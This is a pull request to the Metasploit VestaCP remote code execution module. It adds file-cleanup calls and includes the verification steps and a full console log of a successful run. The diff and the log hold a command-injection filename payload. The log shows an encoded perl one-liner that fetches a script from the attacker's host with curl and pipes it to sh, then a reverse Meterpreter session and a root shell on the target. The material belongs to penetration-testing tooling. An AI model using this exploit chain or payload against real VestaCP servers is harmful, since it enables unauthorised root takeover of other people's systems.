### PR TITLE
Cleanup and Description fixes for VestaCP Exploit

### DIFF
--- a/modules/exploits/linux/http/vestacp_exec.rb
+++ b/modules/exploits/linux/http/vestacp_exec.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Ftp
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
@@ -43,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'Stability'   => [ CRASH_SAFE, ],
           'Reliability' => [ FIRST_ATTEMPT_FAIL, ],
-          'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, ],
+          'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK,	],
         }
     ))
 
@@ -231,6 +232,8 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('The file with the payload in the file name has been successfully uploaded.')
     disconnect
 
+    register_file_for_cleanup("/home/#{username}/.a';$(#{p});'")
+
     # Revert datastore variables.
     datastore['RPORT'] = port_restore
     datastore['SSL'] = true if ssl_restore
@@ -248,6 +251,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('First stage is executed ! Sending 2nd stage of the payload')
     second_stage = "python -c \"#{payload.encoded}\""
     send_response(cli, second_stage, {'Content-Type'=>'text/html'})
+    register_file_for_cleanup("/usr/local/vesta/data/users/#{username}/backup.conf")
   end
 
   def start_http_server


### PR DESCRIPTION
This change updates the `vestacp_exec.rb` to mark it as potentially leaving artifacts on disk with ARTIFACTS_ON_DISK and also adds support for utilizing the `Msf::Exploit::FileDropper` mixin to automatically remove the `backup.conf` file and the payload file from the target system to prevent the creation of a backdoor on the system.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/vestacp_exe`
- [x] `set PAYLOAD python/meterpreter/reverse_tcp`
- [x] `set LHOST *local ip*`
- [x] `set RHOSTS *target ip*`
- [x] `set USERNAME *user to log in as, ideally a low privileged user*`
- [x] `set PASSWORD *password for this user*`
- [x] `set SRVPORT *port number of your choice*`
- [x] `set LPORT *port number of your choice*`
- [x] **Verify** that after waiting for a few minutes, your shell is spawned.
- [x] **Verify** that the `backup.conf` file was removed from the location specified in the console output.
- [x] **Verify** that the payload file was removed from the location specified in the console output screen.

For reference here is the output after I ran this myself:

```
msf5 exploit(linux/http/vestacp_exec) > show options

Module options (exploit/linux/http/vestacp_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   carlot           yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.205.133  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8083             yes       The target port (TCP)
   SRVHOST    192.168.250.1    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8899             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the vulnerable instance
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   carlot           yes       The username to login as
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.205.1    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.205.1
SRVHOST => 192.168.205.1
msf5 exploit(linux/http/vestacp_exec) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.205.1:4444 
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.205.133:8083 - Using URL: http://192.168.205.1:8899/Izd4qxFKLps
[*] 192.168.205.133:8083 - Second payload download URI is http://192.168.205.1:8899/Izd4qxFKLps
[+] 192.168.205.133:21 - Successfully authenticated to the FTP service
[+] 192.168.205.133:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.205.133:8083 - Retrieving cookie and csrf token values
[+] 192.168.205.133:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.205.133:8083 - Authenticating to HTTP Service with given credentials
[*] 192.168.205.133:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.205.133:8083 - Scheduled backup has been started ! 
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.133:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.205.133:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.205.133
[*] Meterpreter session 1 opened (192.168.205.1:4444 -> 192.168.205.133:44166) at 2020-04-14 13:35:18 -0500
[+] 192.168.205.133:8083 - Deleted /home/carlot/.a';$(perl${IFS}-e${IFS}'system(pack(qq,H104,,qq,6375726c202d73534c20687474703a2f2f3139322e3136382e3230352e313a383839392f497a64347178464b4c7073207c207368,))');'
[+] 192.168.205.133:8083 - Deleted /usr/local/vesta/data/users/carlot/backup.conf

msf5 exploit(linux/http/vestacp_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > 
[+] 192.168.205.133:8083 - Payload appears to have executed in the background. Enjoy the shells <3

meterpreter > shell
Process 25549 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# 
```
